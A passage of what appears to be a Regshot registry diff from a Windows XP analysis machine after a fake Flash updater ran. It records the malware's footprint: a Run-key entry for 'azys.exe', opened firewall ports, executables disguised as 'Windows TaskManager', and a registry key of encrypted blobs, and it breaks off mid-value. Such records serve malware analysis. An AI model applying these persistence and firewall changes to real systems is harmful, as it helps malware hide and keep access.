  1438. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\ConfigFlags: 0x00000000
  1439. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Class: "LegacyDriver"
  1440. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
  1441. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\DeviceDesc: "PROCEXP141"
  1442. HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\NextInstance: 0x00000001
  1443. HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
  1444. HKLM\SYSTEM\CurrentControlSet\Services\RemoteAccess\Performance\Error Count: 0x00000002
  1445. HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications: 0x00000000
  1446. HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\24599:UDP: "24599:UDP:*:Enabled:UDP 24599"
  1447. HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\14780:TCP: "14780:TCP:*:Enabled:TCP 14780"
  1448. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\{8050BE41-0268-42B2-900E-11DE9FEDDDF7}\Identity Ordinal: 0x00000001
  1449. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File2: "C:\Documents and Settings\rik\デスクトップ\001.bmp"
  1450. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\b: 72 00 65 00 67 00 73 00 68 00 6F 00 74 00 2E 00 65 00 78 00 65 00 00 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 72 00 69 00 6B 00 5C 00 C7 30 B9 30 AF 30 C8 30 C3 30 D7 30 00 00
  1451. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\b: "C:\Documents and Settings\rik\デスクトップ\shot001.hiv"
  1452. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\c: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
  1453. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\b: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
  1454. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv\a: "C:\Documents and Settings\rik\デスクトップ\shot001.hiv"
  1455. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv\MRUList: "a"
  1456. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList\a: "regshot.exe"
  1457. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList\MRUList: "a"
  1458. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\1: 30 00 30 00 32 00 2E 00 62 00 6D 00 70 00 00 00 3C 00 32 00 00 00 00 00 00 00 00 00 00 00 30 30 32 2E 6C 6E 6B 00 26 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 30 00 30 00 32 00 2E 00 6C 00 6E 00 6B 00 00 00 16 00 00 00
  1459. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\1: 30 00 30 00 32 00 2E 00 62 00 6D 00 70 00 00 00 3C 00 32 00 00 00 00 00 00 00 00 00 00 00 30 30 32 2E 6C 6E 6B 00 26 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 30 00 30 00 32 00 2E 00 6C 00 6E 00 6B 00 00 00 16 00 00 00
  1460. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:Jverfunex.yax: 01 00 00 00 06 00 00 00 B0 03 DE 89 1D AC CD 01
  1461. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Cebtenz Svyrf\Jverfunex\jverfunex.rkr: 01 00 00 00 06 00 00 00 40 37 10 8A 1D AC CD 01
  1462. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\evx\デスクトップ\cebprkc.rkr: 01 00 00 00 06 00 00 00 C0 26 FC 92 1D AC CD 01
  1463. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\evx\デスクトップ\hcqngr_synfu_cynlre.rkr: 01 00 00 00 06 00 00 00 60 3E 40 BF 1D AC CD 01
  1464. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Run\{006579CE-45C4-AD42-587D-A196614C8284}: ""C:\Documents and Settings\rik\Application Data\Zeon\azys.exe""
  1465. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\rik\デスクトップ\procexp.exe: "Sysinternals Process Explorer"
  1466. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\rik\デスクトップ\update_flash_player.exe: "Windows TaskManager"
  1467. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\842656.exe: "Windows TaskManager"
  1468. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\851468.exe: "Windows TaskManager"
  1469. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\abcd.bat: "abcd"
  1470. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Server ID: 0x00000003
  1471. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\Account Name: "WhoWhere インターネット ディレクトリ サービス"
  1472. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Server: "ldap.whowhere.com"
  1473. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP URL: "http://www.whowhere.com"
  1474. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Search Return: 0x00000064
  1475. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Timeout: 0x0000003C
  1476. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Authentication: 0x00000000
  1477. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Simple Search: 0x00000001
  1478. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Logo: "%ProgramFiles%\Common Files\Services\whowhere.bmp"
  1479. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Server ID: 0x00000002
  1480. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\Account Name: "VeriSign インターネット ディレクトリ サービス"
  1481. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Server: "directory.verisign.com"
  1482. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP URL: "http://www.verisign.com"
  1483. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Search Return: 0x00000064
  1484. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Timeout: 0x0000003C
  1485. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Authentication: 0x00000000
  1486. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Search Base: "NULL"
  1487. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Simple Search: 0x00000001
  1488. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Logo: "%ProgramFiles%\Common Files\Services\verisign.bmp"
  1489. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Server ID: 0x00000001
  1490. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\Account Name: "Bigfoot インターネット ディレクトリ サービス"
  1491. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Server: "ldap.bigfoot.com"
  1492. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP URL: "http://www.bigfoot.com"
  1493. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Search Return: 0x00000064
  1494. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Timeout: 0x0000003C
  1495. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Authentication: 0x00000000
  1496. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Simple Search: 0x00000001
  1497. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Logo: "%ProgramFiles%\Common Files\Services\bigfoot.bmp"
  1498. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Server ID: 0x00000000
  1499. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\Account Name: "Active Directory"
  1500. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Server: "NULL"
  1501. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Search Return: 0x00000064
  1502. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Timeout: 0x0000003C
  1503. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Authentication: 0x00000002
  1504. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Simple Search: 0x00000000
  1505. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Bind DN: 0x00000000
  1506. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Port: 0x00000CC4
  1507. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Resolve Flag: 0x00000001
  1508. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Secure Connection: 0x00000000
  1509. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP User Name: "NULL"
  1510. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Search Base: "NULL"
  1511. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\PreConfigVer: 0x00000004
  1512. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\PreConfigVerNTDS: 0x00000001
  1513. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Server ID: 0x00000004
  1514. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Default LDAP Account: "Active Directory GC"
  1515. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\16c6jhji: 10 38 3A 8C EC 37 4D 37 6B 85 7C 00 79 57
  1516. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\1b52cjj4: 0x8C5B382D
  1517. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\2b4gb2j8: 61 31 68 62 6A 44 34 4F 4B 54 63 65 68 55 30 41
  1518. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\12jcjhb1: 7C 38 5B 8C F9 07 57 67 98 DF 13 61 02 BC EB 08 51 5E CB CC 76 AA D7 50 FE 83 D2 B6 EA 82 D3 DB 63 B8 8B 43 DC E2 C2 CB CC B6 70 ED 1C 61 08 D8 6A 7E A0 5D 57 FA DE C5 AF D7 91 F1 D2 AD 6B 2F A7 88 0B 28 97 70 54 63 34 38 6B 93 6F 61 8C 84 3F E7 95 23 5A BC 49 F9 A2 C1 C4 61 D9 31 F2 C9 2E E6 EF 1E 65 73 2A C2 5F 1A 9E C4 0D 99 CC AF 6D EE C4 77 65 CC 74 A5 BE 18 C3 1E 66 EA 09 47 A0 C2 80 26 69 BA A4 D3 8F C8 18 DB A9 00 60 95 2D E7 C0 3B 7B 15 EC 06 01 62 0B BA 53 B7 F4 72 5A 61 3B 87 4F B4 84 5F B5 FF EB 7D A3 BF 6C 82 18 17 8A 58 A5 CC F6 0E 1E 8E 6C 10 3C 48 48 C7 DB AB 86 68 7A 58 22 A1 E1 BB 7B B5 10 D5 FB F8 37 90 90 A8 A6 C8 8A B0 90 0C 2C A5 9B BD 0B BE E2 2A 44 E3 10 07 C7 60 4E 16 C8 3A D8 08 C7 B8 C3 5A 5E 26 B3 D9 4B 93 8C 67 2B 32 DF F8 5D 42 BB 56 79 28 74 3D DD 9A 94 A4 D7 94 B0 D9 54 C7 F5 25 4C A7 DD 56 4D 9A 34 54 1E EE 04 A0 5D 6B F0 9A 85 67 C4 14 1B D1 F9 CB 97 B3 7D AD 83 0D 7A 26 3D DE 56 21 73 A3 F1 E3 AA 93 5D B2 3B BF 51 7C 98 EF AD 1B D6 0B 9D 36 22 F9 9E F8 8E 59 2F DD F2 F5 85 20 19 7C A5 40 E0 4B 21 A2 70 B5 6B C8 B0 B9 1C 47 3D DC 21 69 90 07 5B 9F AF 86 CA 75 6C 47 7C A5 D3 AF D5 4C 93 D0 A6 F5 F6 EB 2F D9 99 13 DD 6C 66 66 AE 7C 10 F8 D2 C1 66 E7 D5 75 3D 4D 2E 91 77 B4 20 A0 DA A2 A7 54 6C 22 B2 05 14 65 E2 74 36 1F 0D BA 3E DF 0D B9 71 A3 FE 2C 7D B3 A1 2C 17 4D 95 EC A4 99 DA C8 13 DE EE DA FE 75 E8 84 92 D1 22 4D 0B 88 66 67 C6 E1 1C 39 F1 26 0C 12 07 61 68 A0 87 6B BE 9A 4C 9D BB 82 F6 97 AB 39 AD 37 0D A6 1A 4A B0 9A 05 B1 6C 7A FD D5 1A 75 5A A4 F8 97 D6 82 93 5C 5D F2 D3 AC 84 7F 61 A1 7C 84 C5 67 7E 84 D9 57 02 F2 53 32 DA 75 4C 31 EB 76 A5 D3 27 18 58 60 8E 56 7E 71 C6 58 4E B0 34 AF 15 C6 B2 06 3E D8 63 D8 FB 65 65 47 BC 31 97 EC BC CD 20 BF DB 20 49 7A AD 58 E8 7C 77 C0 56 4C 79 B6 1D F3 13 09 91 B8 D0 30 3F 3B B0 81 D1 5C 1C 96 D4 A4 A9 9F 43 DC 0B C5 1A 08 37 96 66 78 62 33 CA 89 C9 4D 1D 55 50 CD 6E B0 38 51 EE F3 9E A9 7C 7A 22 1E C9 55 AE 5C 77 86 5B 93 F6 57 41 F9 14 5E A4 E4 B5 87 0C FD 52 99 AF 06 3B 35 4F 3F 52 ED B6 5A E3 48 C2 A7 5B 63 A6 21 33 3D 32 D4 8F 2F D2 24 3E 74 79 1E D9 E0 60 40 59 26 99 21 0E FD 55 69 82 D3 0E 93 52 33 0A A5 F0 8E BD 17 29 B9 8D C8 E1 A6 63 CB D3 64 AC 61 42 50 A6 CB CC 88 C7 67 C0 C0 D6 41 98 47 00 BF CD 93 29 ED 67 3F F1 B2 4F 0E EA 8E A6 84 C2 5F B5 2E DC 36 C4 8A FF 81 E3 60 C3 96 A2 7B 6C 98 69 3B DD E2 46 73 2F 3C F5 8A 2F 32 D2 63 24 3E 6F F0 7A D3 2F B3 22 1F 65 88 50 78 A1 C9 B0 46 B6 E2 20 46 87 0F 3B A3 DD 0A AA 6B C9 ED EE 71 B5 E7 F6 21 E8 F2 5C 8F FC C4 9A AB 8D 25 A5 C3 00 75 B5 BC FC 19 0E F0 29 BE A5 D0 DE 87 D1 09 24 A6 04 ED 1E 29 17 00 19 14 3C 2F F6 B3 FF 71 FE 1B 76 90 07 44 C2 8A EA F5 31 60 D4 A8 86 E2 95 C4 C3 EA 06 DA 5C C2 42 50 EA 4A 03 0D E8 D9 42 2A 26 C7 40 D7 F5 A0 CC 24 BE E2 64 16 80 71 D8 27 41 6A 30 6D EE 7E 8C DC A2 7A 05 A0 94 E1 EE 83 BE 0A 23 DB 81 FA 0C E8 F8 0A 30 34 19 15 06 D7 79 77 72 A8 0A CD 24 93 74 94 0F 74 A2 0F 5A C9 C7 00 8C 51 FD ED E8 FC 49 89 BC 6B 0D B8 0F 5D CE 9E BB FA 63 FE 36 29 E5 4F 1D 31 6D 85 67 44 02 06 CB FC 1D A5 AC 15 AB BC 86 6B A3 54 99 A2 27 3D 29 42 99 71 DC 3B 06 5F 64 32 1F 1C 24 BD AD 7A 0C 80 C9 7C AE 19 29 08 45 05 C8 35 6D CA AC B1 BC 02 94 38 D7 FD 95 F3 11 0B 78 63 BA F4 89 39 56 4D 47 23 C4 44 1A 7A C7 54 75 8E 0F 5F 61 4A 86 65 17 8C B4 6D 18 5B D3 19 5F CF E1 2A FE 27 DD 98 13 94 9F CD C4 9B 7B AA FB 43 48 1C F2 BD 05 C2 BB EF F1 40 9F 61 4E D9 E7 D8 AF DF CE F7 03 B7 BC DD 24 CD 30 92 9F EE 3A 36 37 2D F5 54 EC DA CC 2D 21 1E 9C 00 64 A9 A0 F6 6C 10 78 A6 0C 63 E3 48 41 49 82 B8 6B 91 B9 7A 3C 80
  1519. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\7ec4g79: 66 44 68 62 6A 49 49 33 4B 54 63 66 74 55 77 41 54 6C 66 46 4F 52 36 52 73 37 6A 58 6C 63 66 5A 45 39 4E 33 56 58 6E 39 6C 7A 77 69 6E 6F 5A 47 79 4D 6A 35 49 62 2B 32 63 4F 30 63 59 51 6A 59 61 6E 36 67 58 56 66 36 33 73 57 76 31 35 48 71 52 34 48 6D 6F 5A 65 75 79 41 2F 53 36 6A 61 4A 4E 63 39 34 44 38 76 53 59 4D 36 73 59 37 52 6C 65 71 74 61 46 54 4B 31 78 6A 71 65 50 55 35 66 54 48 5A 59 70 4F 63 4B 67 79 74 55 6E 43 4E 78 49 76 61 75 4C 51 43 78 6F 37 77 37 69 4F 4D 67 51 2B 55 63 44 41 5A 51 54 73 4D 51 6D 5A 35 6E 64 61 5A 6F 4F 79 7A 7A 77 6A 67 2B 48 71 32 58 58 34 46 42 55 50 63 54 33 62 33 34 68 30 77 39 4C 72 52 32 6D 79 4E 4B 4F 4E 66 36 7A 71 51 69 58 6B 52 73 4F 38 6A 4C 43 4F 43 4D 56 41 48 44 32 49 54 51 36 37 67 6F 4E 62 6B 65 6A 65 67 59 55 57 6B 76 6A 51 41 5A 67 56 6B 7A 32 68 77 67 4D 4F 63 32 6B 55 52 55 77 6F 74 66 57 49 55 7A 37 2B 2B 75 6F 4F 49 69 51 68 62 63 6C 34 42 31 70 44 63 4D 6B 48 34 57 49 7A 56 6F 37 48 71 69 49 74 46 57 45 59 61 31 58 66 39 43 47 33 39 55 31 71 4A 37 2F 64 74 52 6D 41 2B 66 4F 4A 34 4D 6B 54 72 53 45 6E 62 2F 6E 79 38 75 47 71 42 2F 55 61 75 4F 68 51 33 75 79 77 6F 59 76 38 54 51 76 34 34 67 35 64 53 51 59 34 34 53 47 65 44 4C 4F 32 75 78 75 6D 34 43 55 49 48 46 4A 5A 34 45 71 57 4D 4F 6B 31 32 79 4F 37 39 52 66 4A 6A 76 72 52 76 57 43 35 30 32 49 76 6D 65 2B 49 35 5A 4C 39 33 79 39 51 41 51 5A 79 77 68 4C 50 34 50 6F 64 66 59 68 6F 2B 30 57 68 6D 47 30 37 38 65 62 75 72 52 71 78 43 50 46 31 33 6B 48 47 78 48 66 4B 58 54 72 39 56 4D 6B 39 43 6D 39 66 62 72 4C 39 6D 5A 45 39 31 73 5A 6D 61 75 66 42 44 34 56 2F 45 59 74 31 4E 35 4D 50 74 35 50 62 46 44 56 6D 72 55 58 4D 51 33 68 33 56 75 32 43 59 61 67 4E 66 58 57 52 62 33 50 74 38 4E 75 58 47 6A 2F 69 78 39 73 36 45 73 46 30 32 56 37 4B 53 5A 32 73 67 54 33 75 37 61 2F 6E 56 75 74 4F 79 42 6F 46 39 56 45 69 70 76 6E 39 6F 7A 70 54 67 34 48 76 36 58 46 53 69 77 77 44 6E 79 4B 35 73 6B 4C 65 48 32 6C 70 73 34 72 54 63 4E 70 70 70 76 61 6E 67 7A 70 66 31 66 5A 37 4A 33 72 57 62 4B 56 42 69 67 79 6C 50 34 66 31 75 74 33 4C 64 6A 41 58 49 47 61 72 46 46 56 70 2B 31 46 70 5A 51 2B 67 30 62 45 53 7A 48 2B 52 69 63 65 4A 62 46 72 75 52 43 62 4B 46 32 58 41 79 37 77 4F 34 38 53 73 68 69 48 65 50 4F 4F 75 33 59 64 4D 6E 38 58 32 2F 65 75 72 72 48 68 52 61 4B 4F 31 34 72 75 2B 69 2F 6B 59 45 48 62 65 4F 35 30 58 4F 4E 66 77 6E 53 49 4C 31 66 4D 77 2F 65 55 35 47 2B 59 2B 49 5A 55 62 64 33 62 65 55 39 48 53 6D 66 72 4D 6E 38 65 4C 37 38 77 64 43 63 43 66 5A 45 74 67 53 36 59 67 67 65 58 2F 63 74 5A 5A 45 78 33 68 6D 5A 34 34 5A 4B 6C 71 44 7A 4B 4E 37 77 76 31 6C 36 4B 6F 32 74 66 42 42 30 41 42 66 77 2F 57 58 63 78 35 74 72 46 48 47 5A 63 6E 4D 59 6E 42 6C 52 6D 48 43 75 71 6C 57 31 70 6E 67 41 53 6F 4B 59 73 69 6E 69 59 51 31 6B 46 4D 34 7A 43 54 57 62 50 31 30 7A 41 52 5A 51 54 42 38 67 68 79 6A 33 45 38 69 61 4B 71 44 42 55 70 62 43 72 44 58 39 66 46 6A 6B 58 68 38 77 65 6B 4D 47 42 72 37 63 77 66 54 55 50 71 64 67 79 34 34 31 4B 4A 48 4F 73 65 71 61 61 5A 59 4A 6D 50 6D 38 2B 43 71 73 6E 55 66 67 72 6F 78 6A 79 6D 50 4B 67 65 77 64 76 43 6B 34 68 45 42 45 51 4F 4A 69 71 53 69 48 44 4A 57 61 62 75 4B 34 42 52 47 67 39 4C 47 39 5A 51 46 44 4F 45 47 49 50 51 5A 51 79 6D 6A 61 76 30 42 77 7A 79 75 42 39 6C 42 4B 77 44 44 4A 37 65 35 78 74 65 66 32 49 65 6A 79 58 49 2F 38 78 4A 71 72 6A 53 57 6C 77 77 42 31 74 62 7A 38 47 59 54 41 56 2B 34 6B 75 6E 59 70 76 44 65 6B 75 58 2B 2B 57 76 67 42 53 47 4B 43 70 72 6D 76 67 72 48 4E 31 57 78 73 6F 51 64 45 77 6F 72 71 39 54 46 67 31 4B 69 47 34 70 58 45 77 2B 6F 47 32 6C 7A 43 51 6C 44 71 53 67 4D 4E 59 2B 6B 38 65 71 59 49 76 47 44 32 55 51 2F 64 49 4D 45 34 57 75 49 6D 64 44 55 6F 74 6E 66 70 4C 64 66 78 4F 47 77 4F 42 61 43 55 34 65 36 44 76 67 6F 6A 32 34 48 36 44 4F 6A 34 43 6A 41 30 47 52 55 47 31 33 6C 33 63 71 69 42 2F 56 76 7A 38 6B 78 64 4C 6B 51 6B 57 33 69 44 66 72 70 51 46 4B 35 67 56 45 33 31 67 4C 4C 35 56 34 43 4B 62 37 31 57 47 31 77 5A 43 69 6E 6C 54 78 30 78 62 59 56 6E 52 41 49 47 79 2F 77 64 70 61 77 56 71 2F 31 38 66 46 44 49 64 4D 77 6F 56 55 56 6E 56 65 69 4D 70 76 48 4D 59 7A 6C 48 44 55 68 73 4C 78 63 38 55 53 75 55 64 30 2F 52 51 35 43 30 30 48 66 39 39 4D 66 43 4D 4F 50 6B 64 37 4E 37 78 5A 62 6E 41 43 58 70 79 7A 4F 52 41 4D 7A 65 30 76 55 6B 52 56 78 4F 65 31 49 79 6C 79 42 6E 74 6F 4A 5A 34 53 59 32 51 77 36 30 4B 38 30 46 77 37 68 31 30 42 59 65 4E 4A 45 64 7A 2B 4B 30 34 79 59 36 77 6E 36 6B 54 77 77 55 67 5A 45 2F 71 41 51 49 4B 4C 45 4F 31 45 71 74 54 74 64 42 58 58 77 72 4D 79 2F 75 64 75 59 63 30 6E 68 66 62 42 63 64 2B 36 6F 6D 41 30 76 33 79 76 4E 68 54 45 6E 4E 77 32 73 70 77 52 2B 59 4F 34 76 48 48 54 66 5A 54 63 50 33 59 6B 33 42 73 2B 57 76 77 67 37 4F 54 63 4C 62 6C 68 6F 47 38 46 53 75 4E 36 75 77 54 56 41 33 63 35 4C 6E 4E 48 66 55 31 4E 4D 44 39 59 4F 74 76 79 6C 39 59 6F 33 72 4F 69 4B 55 44 49 2B 35 43 2B 61 70 30 69 4D 73 37 56 59 50 76 52 2B 54 50 30 2B 55 5A 77 74 70 33 6E 5A 76 38 6F 50 47 62 42 52 45 45 39 4C 7A 6F 57 56 5A 44 7A 42 71 63 6C 7A 31 37 65 48 66 54 4B 50 46 71 53 57 59 35 54 42 33 32 72 2B 2B 2B 34 65 4B 79 30 6A 66 6D 68 44 6C 64 4F 2F 38 56 48 46 6E 6F 34 77 78 33 2F 4D 2F 4D 79 37 33 64 6F 2B 2F 55 71 79 2F 4C 4A 5A 75 62 75 4A 44 62 36 36 62 72 51 32 53 43 4E 50 52 62 4F 67 39 6B 37 6A 61 67 56 49 78 57 58 31 31 75 53 48 58 6F 51 61 6A 63 75 4B 48 58 33 69 74 2F 77 5A 33 6B 4E 50 36 6C 4A 38 78 67 30 62 76 6F 50 59 32 33 39 41 54 63 57 37 49 53 64 4F 45 4C 2B 4D 49 41 6B 44 63 61 49 76 4E 50 45 4C 45 42 72 77 37 72 4C 79 57 4D 4F 41 73 4F 44 30 2B 72 4F 73 6E 6B 30 54 4A 30 6E 59 50 41 4D 45 69 31 57 47 52 33 4F 4A 35 56 55 51 30 73 51 73 48 62 38 4A 69 31 76 66 6F 34 31 34 44 66 63 4B 65 6E 6D 66 68 76 33 73 79 7A 76 2B 57 59 2B 2F 70 6D 37 52 49 49 71 72 47 65 4A 43 42 67 45 4F 6B 32 31 